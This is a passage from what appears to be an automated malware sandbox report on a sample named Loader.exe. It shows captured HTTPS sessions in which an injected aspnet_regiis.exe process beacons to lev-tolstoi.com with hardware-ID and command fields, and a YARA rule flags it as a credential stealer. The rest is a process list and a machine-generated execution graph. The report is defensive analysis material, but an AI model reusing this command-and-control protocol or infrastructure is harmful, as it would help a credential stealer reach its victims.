                                                                                                                                                                                                                                                                CF-RAY: 8f9481f17a98c342-EWR
                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1648&min_rtt=1640&rtt_var=631&sent=16&recv=25&lost=0&retrans=0&sent_bytes=2835&recv_bytes=21542&delivery_rate=1712609&cwnd=160&unsent_bytes=0&cid=e5e28032e505148d&ts=953&x=0"
                                                                                                                                                                                                                                                                2024-12-28 21:05:17 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                2024-12-28 21:05:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID: 6 | Source IP: 192.168.2.5 | Source Port: 49710 | Destination IP: 172.67.157.254 | Destination Port: 443 | PID: 5772 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-28 21:05:19 UTC | 280 bytes | OUT
POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=0GFWAZ436VZL5S3QE3
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 1278
Host: lev-tolstoi.com
2024-12-28 21:05:19 UTC | 1278 bytes | OUT
Data Raw: 2d 2d 30 47 46 57 41 5a 34 33 36 56 5a 4c 35 53 33 51 45 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 41 35 44 39 31 38 45 43 30 35 43 44 46 45 36 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 30 47 46 57 41 5a 34 33 36 56 5a 4c 35 53 33 51 45 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 30 47 46 57 41 5a 34 33 36 56 5a 4c 35 53 33 51 45 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 35 64 65 66 61
Data Ascii: --0GFWAZ436VZL5S3QE3Content-Disposition: form-data; name="hwid"6A5D918EC05CDFE6BEBA0C6A975F1733--0GFWAZ436VZL5S3QE3Content-Disposition: form-data; name="pid"1--0GFWAZ436VZL5S3QE3Content-Disposition: form-data; name="lid"HpOoIh--5defa
2024-12-28 21:05:20 UTC | 1130 bytes | IN
HTTP/1.1 200 OK
Date: Sat, 28 Dec 2024 21:05:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=5ene8vh1n0ppvgh1fqd44al863; expires=Wed, 23 Apr 2025 14:51:58 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p8tT%2BHm%2Fd%2BW56eaw%2BdcCdkdbmvfttfdKov8f0uPcXAgk65gtVSZZkRa0BcoSnQZf9mym%2Br1gCypqzom%2BhbfVJYeoLGs04S7hrpaPtFn37jsKcpjPB2ycgmeQIwTHPIoeU0o%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f948201993a1a03-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1926&min_rtt=1921&rtt_var=731&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=2194&delivery_rate=1487519&cwnd=142&unsent_bytes=0&cid=f762422e01b4f7e6&ts=788&x=0"
2024-12-28 21:05:20 UTC | 20 bytes | IN
Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-28 21:05:20 UTC | 5 bytes | IN
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 7 | Source IP: 192.168.2.5 | Source Port: 49713 | Destination IP: 172.67.157.254 | Destination Port: 443 | PID: 5772 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-28 21:05:21 UTC | 278 bytes | OUT
POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=LNSWTUQTFNJU1FQS
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 1121
Host: lev-tolstoi.com
2024-12-28 21:05:21 UTC | 1121 bytes | OUT
Data Raw: 2d 2d 4c 4e 53 57 54 55 51 54 46 4e 4a 55 31 46 51 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 41 35 44 39 31 38 45 43 30 35 43 44 46 45 36 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 4c 4e 53 57 54 55 51 54 46 4e 4a 55 31 46 51 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4c 4e 53 57 54 55 51 54 46 4e 4a 55 31 46 51 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 35 64 65 66 61 30 36 66 63 36 61
Data Ascii: --LNSWTUQTFNJU1FQSContent-Disposition: form-data; name="hwid"6A5D918EC05CDFE6BEBA0C6A975F1733--LNSWTUQTFNJU1FQSContent-Disposition: form-data; name="pid"1--LNSWTUQTFNJU1FQSContent-Disposition: form-data; name="lid"HpOoIh--5defa06fc6a
2024-12-28 21:05:22 UTC | 1120 bytes | IN
HTTP/1.1 200 OK
Date: Sat, 28 Dec 2024 21:05:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=0diua00no84i94u4e5lmv8g9f1; expires=Wed, 23 Apr 2025 14:52:01 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KnTfXZpsrE2ZjJRBLhg8gobmfLRd948miEQsbizSQ9P4I9BkkKnYyW1bSYx9h0USUdIfEE3QQPhO1GYFQ6pHddgacBcCuGP1JypTf2bcR6r6Q9%2FpGME5pqlCmS5d1Onp09o%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f94820f1f188c4b-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1963&min_rtt=1956&rtt_var=748&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=2035&delivery_rate=1447694&cwnd=232&unsent_bytes=0&cid=bb26e2db9e7b93f2&ts=820&x=0"
2024-12-28 21:05:22 UTC | 20 bytes | IN
Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-28 21:05:22 UTC | 5 bytes | IN
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 49716 | 172.67.157.254 | 443 | 5772 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-28 21:05:23 UTC | 264 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 121
Host: lev-tolstoi.com
2024-12-28 21:05:23 UTC | 121 | OUT | Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 35 64 65 66 61 30 36 66 63 36 61 62 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61 26 68 77 69 64 3d 36 41 35 44 39 31 38 45 43 30 35 43 44 46 45 36 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33
Data Ascii: act=get_message&ver=4.0&lid=HpOoIh--5defa06fc6ab&j=b9abc76ce53b6fc3a03566f8f764f5ea&hwid=6A5D918EC05CDFE6BEBA0C6A975F1733
2024-12-28 21:05:24 UTC | 1136 | IN | HTTP/1.1 200 OK
Date: Sat, 28 Dec 2024 21:05:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=6frn4p4kmdqtm7qrbmjuhe1h36; expires=Wed, 23 Apr 2025 14:52:03 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2TrhHM0%2B9rEf9donsocwF8w%2FC7mEsPIu9tItMKft8pKr%2Fdb%2F15ByAj%2FE1hogdZsj8VlxIpuQ5xAUEIC0EmpwFB08y%2B7M1uT%2FhZg0oNpEMudhZRUvhUAUnGfSHZr6v%2FMC%2Byo%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f94821cfa0a0cb8-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1620&min_rtt=1614&rtt_var=618&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2834&recv_bytes=1021&delivery_rate=1751649&cwnd=179&unsent_bytes=0&cid=d7d46a154e13e430&ts=923&x=0"
2024-12-28 21:05:24 UTC | 54 | IN | Data Raw: 33 30 0d 0a 6f 6b 4a 36 38 35 71 45 54 50 56 67 52 46 6d 71 35 76 33 48 49 39 49 64 6c 51 32 4f 39 65 51 64 6e 4d 2f 41 34 71 55 6b 39 65 50 35 48 77 3d 3d 0d 0a
Data Ascii: 30okJ685qETPVgRFmq5v3HI9IdlQ2O9eQdnM/A4qUk9eP5Hw==
2024-12-28 21:05:24 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Target ID: 0
Start time: 16:05:00
Start date: 28/12/2024
Path: C:\Users\user\Desktop\Loader.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\Loader.exe"
Imagebase: 0xb40000
File size: 662'016 bytes
MD5 hash: 2EC18B257662DD107AE84263ECD2E5C1
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 1
Start time: 16:05:00
Start date: 28/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 16:05:01
Start date: 28/12/2024
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
Imagebase: 0x6d0000
File size: 43'016 bytes
MD5 hash: 5D1D74198D75640E889F0A577BBF31FC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2176809705.0000000003577000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: moderate
Has exited: true


Execution Graph

Execution Coverage: 8.7%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 13.3%
Total number of Nodes: 1166
Total number of Limit Nodes: 7
12382->12368 12384 6ce554d1 12383->12384 12385 6ce527a5 12383->12385 12384->12385 12453 6ce558cc 12384->12453 12387 6ce554eb 12385->12387 12388 6ce554fe 12387->12388 12390 6ce55513 12387->12390 12388->12390 12475 6ce53ff0 12388->12475 12402 6ce54d02 12391->12402 12394 6ce5271b 12396 6ce52725 IsProcessorFeaturePresent 12394->12396 12397 6ce52744 12394->12397 12398 6ce52731 12396->12398 12432 6ce51e58 12397->12432 12400 6ce5167c __fassign 8 API calls 12398->12400 12400->12397 12435 6ce54c34 12402->12435 12405 6ce54d47 12406 6ce54d53 ___scrt_is_nonwritable_in_current_image 12405->12406 12407 6ce54d80 __fassign 12406->12407 12408 6ce52d7e _free 14 API calls 12406->12408 12409 6ce54d7a __fassign 12406->12409 12415 6ce54df3 12407->12415 12446 6ce52eba EnterCriticalSection 12407->12446 12408->12409 12409->12407 12410 6ce54dc7 12409->12410 12413 6ce54db1 12409->12413 12411 6ce5304b _free 14 API calls 12410->12411 12412 6ce54dcc 12411->12412 12414 6ce51828 ___std_exception_copy 25 API calls 12412->12414 12413->12394 12414->12413 12418 6ce54e35 12415->12418 12419 6ce54f26 12415->12419 12429 6ce54e64 12415->12429 12424 6ce52c27 __fassign 37 API calls 12418->12424 12418->12429 12420 6ce54f31 12419->12420 12451 6ce52f02 LeaveCriticalSection 12419->12451 12423 6ce51e58 __fassign 23 API calls 12420->12423 12425 6ce54f39 12423->12425 12427 6ce54e59 12424->12427 12425->12394 12426 6ce52c27 __fassign 37 API calls 12430 6ce54eb9 12426->12430 12428 6ce52c27 __fassign 37 API calls 12427->12428 12428->12429 12447 6ce54ed3 12429->12447 12430->12413 12431 6ce52c27 __fassign 37 API calls 12430->12431 12431->12413 12433 6ce51cfe __DllMainCRTStartup@12 23 API calls 12432->12433 12434 6ce51e69 12433->12434 12436 6ce54c40 ___scrt_is_nonwritable_in_current_image 12435->12436 12441 6ce52eba EnterCriticalSection 12436->12441 12438 6ce54c4e 12442 6ce54c8c 12438->12442 12441->12438 12445 6ce52f02 LeaveCriticalSection 12442->12445 12444 6ce52710 12444->12394 12444->12405 12445->12444 12446->12415 
12448 6ce54ed9 12447->12448 12450 6ce54eaa 12447->12450 12452 6ce52f02 LeaveCriticalSection 12448->12452 12450->12413 12450->12426 12450->12430 12451->12420 12452->12450 12454 6ce558d8 ___scrt_is_nonwritable_in_current_image 12453->12454 12455 6ce52c27 __fassign 37 API calls 12454->12455 12456 6ce558e1 12455->12456 12463 6ce55927 12456->12463 12466 6ce52eba EnterCriticalSection 12456->12466 12458 6ce558ff 12467 6ce5594d 12458->12467 12463->12385 12464 6ce5270b __fassign 37 API calls 12465 6ce5594c 12464->12465 12466->12458 12468 6ce55910 12467->12468 12469 6ce5595b __fassign 12467->12469 12471 6ce5592c 12468->12471 12469->12468 12470 6ce55680 __fassign 14 API calls 12469->12470 12470->12468 12474 6ce52f02 LeaveCriticalSection 12471->12474 12473 6ce55923 12473->12463 12473->12464 12474->12473 12476 6ce52c27 __fassign 37 API calls 12475->12476 12477 6ce53ffa 12476->12477 12480 6ce53f08 12477->12480 12481 6ce53f14 ___scrt_is_nonwritable_in_current_image 12480->12481 12484 6ce53f2e 12481->12484 12491 6ce52eba EnterCriticalSection 12481->12491 12483 6ce53f35 12483->12390 12484->12483 12487 6ce5270b __fassign 37 API calls 12484->12487 12485 6ce53f6a 12492 6ce53f87 12485->12492 12488 6ce53fa7 12487->12488 12489 6ce53f3e 12489->12485 12490 6ce52f67 _free 14 API calls 12489->12490 12490->12485 12491->12489 12495 6ce52f02 LeaveCriticalSection 12492->12495 12494 6ce53f8e 12494->12484 12495->12494 12496 6ce51e75 12497 6ce51e85 12496->12497 12498 6ce51e8c 12496->12498 12499 6ce51ead 12498->12499 12500 6ce51e97 12498->12500 12520 6ce53fa8 12499->12520 12502 6ce5304b _free 14 API calls 12500->12502 12504 6ce51e9c 12502->12504 12506 6ce51828 ___std_exception_copy 25 API calls 12504->12506 12506->12497 12512 6ce51f11 12514 6ce5304b _free 14 API calls 12512->12514 12513 6ce51f1d 12515 6ce51fab 37 API calls 12513->12515 12516 6ce51f16 12514->12516 12518 6ce51f35 12515->12518 12517 6ce52f67 _free 14 API calls 12516->12517 12517->12497 12518->12516 12519 6ce52f67 _free 14 API calls 
12518->12519 12519->12516 12521 6ce53fb1 12520->12521 12522 6ce51eb3 12520->12522 12548 6ce52ce4 12521->12548 12526 6ce539ef GetModuleFileNameW 12522->12526 12527 6ce53a2f 12526->12527 12528 6ce53a1e GetLastError 12526->12528 12754 6ce53768 12527->12754 12749 6ce53015 12528->12749 12531 6ce53a2a 12534 6ce4e890 _ValidateLocalCookies 5 API calls 12531->12534 12535 6ce51ec6 12534->12535 12536 6ce51fab 12535->12536 12537 6ce51fd0 12536->12537 12540 6ce52030 12537->12540 12793 6ce542ce 12537->12793 12539 6ce51efb 12542 6ce5211f 12539->12542 12540->12539 12541 6ce542ce 37 API calls 12540->12541 12541->12540 12543 6ce52130 12542->12543 12544 6ce51f08 12542->12544 12543->12544 12545 6ce5305e _free 14 API calls 12543->12545 12544->12512 12544->12513 12546 6ce52159 12545->12546 12547 6ce52f67 _free 14 API calls 12546->12547 12547->12544 12549 6ce52cf5 12548->12549 12550 6ce52cef 12548->12550 12552 6ce5480e _free 6 API calls 12549->12552 12554 6ce52cfb 12549->12554 12551 6ce547cf _free 6 API calls 12550->12551 12551->12549 12553 6ce52d0f 12552->12553 12553->12554 12556 6ce5305e _free 14 API calls 12553->12556 12555 6ce5270b __fassign 37 API calls 12554->12555 12561 6ce52d74 12554->12561 12557 6ce52d7d 12555->12557 12558 6ce52d1f 12556->12558 12559 6ce52d27 12558->12559 12560 6ce52d3c 12558->12560 12563 6ce5480e _free 6 API calls 12559->12563 12562 6ce5480e _free 6 API calls 12560->12562 12573 6ce53df4 12561->12573 12564 6ce52d48 12562->12564 12565 6ce52d33 12563->12565 12566 6ce52d4c 12564->12566 12567 6ce52d5b 12564->12567 12568 6ce52f67 _free 14 API calls 12565->12568 12569 6ce5480e _free 6 API calls 12566->12569 12570 6ce52a29 _free 14 API calls 12567->12570 12568->12554 12569->12565 12571 6ce52d66 12570->12571 12572 6ce52f67 _free 14 API calls 12571->12572 12572->12554 12574 6ce53f08 __fassign 37 API calls 12573->12574 12575 6ce53e07 12574->12575 12592 6ce53b9e 12575->12592 12578 6ce53e20 12578->12522 12581 6ce53e63 12584 6ce52f67 _free 14 API calls 12581->12584 12585 
6ce53e71 12584->12585 12585->12522 12586 6ce53e5e 12587 6ce5304b _free 14 API calls 12586->12587 12587->12581 12588 6ce53ea5 12588->12581 12617 6ce53a90 12588->12617 12589 6ce53e79 12589->12588 12590 6ce52f67 _free 14 API calls 12589->12590 12590->12588 12593 6ce5274f __fassign 37 API calls 12592->12593 12594 6ce53bb0 12593->12594 12595 6ce53bd1 12594->12595 12596 6ce53bbf GetOEMCP 12594->12596 12597 6ce53be8 12595->12597 12598 6ce53bd6 GetACP 12595->12598 12596->12597 12597->12578 12599 6ce52f19 12597->12599 12598->12597 12600 6ce52f57 12599->12600 12604 6ce52f27 _free 12599->12604 12601 6ce5304b _free 14 API calls 12600->12601 12603 6ce52f55 12601->12603 12602 6ce52f42 HeapAlloc 12602->12603 12602->12604 12603->12581 12606 6ce54003 12603->12606 12604->12600 12604->12602 12625 6ce5192a 12604->12625 12607 6ce53b9e 39 API calls 12606->12607 12608 6ce54023 12607->12608 12609 6ce54099 std::bad_exception::bad_exception 12608->12609 12610 6ce5405d IsValidCodePage 12608->12610 12611 6ce4e890 _ValidateLocalCookies 5 API calls 12609->12611 12610->12609 12613 6ce5406f 12610->12613 12612 6ce53e56 12611->12612 12612->12586 12612->12589 12614 6ce5409e GetCPInfo 12613->12614 12616 6ce54078 std::bad_exception::bad_exception 12613->12616 12614->12609 12614->12616 12639 6ce53c74 12616->12639 12618 6ce53a9c ___scrt_is_nonwritable_in_current_image 12617->12618 12723 6ce52eba EnterCriticalSection 12618->12723 12620 6ce53aa6 12724 6ce53add 12620->12724 12628 6ce51957 12625->12628 12629 6ce51963 ___scrt_is_nonwritable_in_current_image 12628->12629 12634 6ce52eba EnterCriticalSection 12629->12634 12631 6ce5196e 12635 6ce519aa 12631->12635 12634->12631 12638 6ce52f02 LeaveCriticalSection 12635->12638 12637 6ce51935 12637->12604 12638->12637 12640 6ce53c9c GetCPInfo 12639->12640 12649 6ce53d65 12639->12649 12641 6ce53cb4 12640->12641 12640->12649 12650 6ce56044 12641->12650 12642 6ce4e890 _ValidateLocalCookies 5 API calls 12644 6ce53df2 12642->12644 12644->12609 12648 6ce56351 41 API 
calls 12648->12649 12649->12642 12651 6ce5274f __fassign 37 API calls 12650->12651 12652 6ce56064 12651->12652 12670 6ce542ff 12652->12670 12654 6ce56122 12655 6ce4e890 _ValidateLocalCookies 5 API calls 12654->12655 12658 6ce53d1c 12655->12658 12656 6ce56091 12656->12654 12657 6ce52f19 15 API calls 12656->12657 12661 6ce560b7 std::bad_exception::bad_exception 12656->12661 12657->12661 12665 6ce56351 12658->12665 12659 6ce5611c 12673 6ce56147 12659->12673 12661->12659 12662 6ce542ff __fassign MultiByteToWideChar 12661->12662 12663 6ce56105 12662->12663 12663->12659 12664 6ce5610c GetStringTypeW 12663->12664 12664->12659 12666 6ce5274f __fassign 37 API calls 12665->12666 12667 6ce56364 12666->12667 12677 6ce56167 12667->12677 12671 6ce54310 MultiByteToWideChar 12670->12671 12671->12656 12674 6ce56164 12673->12674 12675 6ce56153 12673->12675 12674->12654 12675->12674 12676 6ce52f67 _free 14 API calls 12675->12676 12676->12674 12678 6ce56182 12677->12678 12679 6ce542ff __fassign MultiByteToWideChar 12678->12679 12682 6ce561c6 12679->12682 12680 6ce5632b 12681 6ce4e890 _ValidateLocalCookies 5 API calls 12680->12681 12683 6ce53d3d 12681->12683 12682->12680 12685 6ce52f19 15 API calls 12682->12685 12689 6ce561eb 12682->12689 12683->12648 12684 6ce56290 12688 6ce56147 __freea 14 API calls 12684->12688 12685->12689 12686 6ce542ff __fassign MultiByteToWideChar 12687 6ce56231 12686->12687 12687->12684 12705 6ce5489b 12687->12705 12688->12680 12689->12684 12689->12686 12692 6ce56267 12692->12684 12696 6ce5489b 6 API calls 12692->12696 12693 6ce5629f 12694 6ce52f19 15 API calls 12693->12694 12698 6ce562b1 12693->12698 12694->12698 12695 6ce5631c 12697 6ce56147 __freea 14 API calls 12695->12697 12696->12684 12697->12684 12698->12695 12699 6ce5489b 6 API calls 12698->12699 12700 6ce562f9 12699->12700 12700->12695 12711 6ce5437b 12700->12711 12702 6ce56313 12702->12695 12703 6ce56348 12702->12703 12704 6ce56147 __freea 14 API calls 12703->12704 12704->12684 12714 6ce54574 
12705->12714 12708 6ce548ac 12708->12684 12708->12692 12708->12693 12710 6ce548ec LCMapStringW 12710->12708 12712 6ce54392 WideCharToMultiByte 12711->12712 12712->12702 12715 6ce5466f _free 5 API calls 12714->12715 12716 6ce5458a 12715->12716 12716->12708 12717 6ce548f8 12716->12717 12720 6ce5458e 12717->12720 12719 6ce54903 12719->12710 12721 6ce5466f _free 5 API calls 12720->12721 12722 6ce545a4 12721->12722 12722->12719 12723->12620 12734 6ce541f6 12724->12734 12726 6ce53aff 12727 6ce541f6 25 API calls 12726->12727 12728 6ce53b1e 12727->12728 12729 6ce53ab3 12728->12729 12730 6ce52f67 _free 14 API calls 12728->12730 12731 6ce53ad1 12729->12731 12730->12729 12748 6ce52f02 LeaveCriticalSection 12731->12748 12733 6ce53abf 12733->12581 12735 6ce54207 12734->12735 12744 6ce54203 ___scrt_uninitialize_crt 12734->12744 12736 6ce5420e 12735->12736 12739 6ce54221 std::bad_exception::bad_exception 12735->12739 12737 6ce5304b _free 14 API calls 12736->12737 12738 6ce54213 12737->12738 12740 6ce51828 ___std_exception_copy 25 API calls 12738->12740 12741 6ce5424f 12739->12741 12742 6ce54258 12739->12742 12739->12744 12740->12744 12743 6ce5304b _free 14 API calls 12741->12743 12742->12744 12746 6ce5304b _free 14 API calls 12742->12746 12745 6ce54254 12743->12745 12744->12726 12747 6ce51828 ___std_exception_copy 25 API calls 12745->12747 12746->12745 12747->12744 12748->12733 12780 6ce53038 12749->12780 12751 6ce53020 _free 12752 6ce5304b _free 14 API calls 12751->12752 12753 6ce53033 12752->12753 12753->12531 12755 6ce5274f __fassign 37 API calls 12754->12755 12756 6ce5377a 12755->12756 12757 6ce5378c 12756->12757 12783 6ce54732 12756->12783 12759 6ce538ed 12757->12759 12760 6ce53909 12759->12760 12776 6ce538fa 12759->12776 12761 6ce53936 12760->12761 12762 6ce53911 12760->12762 12763 6ce5437b ___scrt_uninitialize_crt WideCharToMultiByte 12761->12763 12762->12776 12789 6ce539b4 12762->12789 12765 6ce53946 12763->12765 12766 6ce53963 12765->12766 12767 6ce5394d GetLastError 
12765->12767 12771 6ce539b4 14 API calls 12766->12771 12774 6ce53974 12766->12774 12768 6ce53015 __dosmaperr 14 API calls 12767->12768 12770 6ce53959 12768->12770 12769 6ce5437b ___scrt_uninitialize_crt WideCharToMultiByte 12772 6ce5398c 12769->12772 12773 6ce5304b _free 14 API calls 12770->12773 12771->12774 12775 6ce53993 GetLastError 12772->12775 12772->12776 12773->12776 12774->12769 12774->12776 12777 6ce53015 __dosmaperr 14 API calls 12775->12777 12776->12531 12778 6ce5399f 12777->12778 12779 6ce5304b _free 14 API calls 12778->12779 12779->12776 12781 6ce52d7e _free 14 API calls 12780->12781 12782 6ce5303d 12781->12782 12782->12751 12786 6ce5455a 12783->12786 12787 6ce5466f _free 5 API calls 12786->12787 12788 6ce54570 12787->12788 12788->12757 12790 6ce539bf 12789->12790 12791 6ce5304b _free 14 API calls 12790->12791 12792 6ce539c8 12791->12792 12792->12776 12796 6ce54277 12793->12796 12797 6ce5274f __fassign 37 API calls 12796->12797 12798 6ce5428b 12797->12798 12798->12537 12799 6ce185f0 12800 6ce1864b 12799->12800 12801 6ce4e890 _ValidateLocalCookies 5 API calls 12800->12801 12802 6ce18e78 12801->12802 12803 6ce522f4 12804 6ce52306 12803->12804 12805 6ce5230c 12803->12805 12807 6ce5229c 12804->12807 12808 6ce522a9 12807->12808 12809 6ce522c6 12807->12809 12810 6ce522c0 12808->12810 12811 6ce52f67 _free 14 API calls 12808->12811 12809->12805 12812 6ce52f67 _free 14 API calls 12810->12812 12811->12808 12812->12809 12821 6ce559b0 12822 6ce559ea 12821->12822 12823 6ce5304b _free 14 API calls 12822->12823 12828 6ce559fe 12822->12828 12824 6ce559f3 12823->12824 12826 6ce51828 ___std_exception_copy 25 API calls 12824->12826 12825 6ce4e890 _ValidateLocalCookies 5 API calls 12827 6ce55a0b 12825->12827 12826->12828 12828->12825 12829 6ce4f5fe 12832 6ce4fe0f 12829->12832 12831 6ce4f613 12833 6ce4fe23 12832->12833 12834 6ce4fe1c 12832->12834 12833->12831 12835 6ce519be ___std_exception_destroy 14 API calls 12834->12835 12835->12833 12836 6ce52e79 12837 6ce52e84 
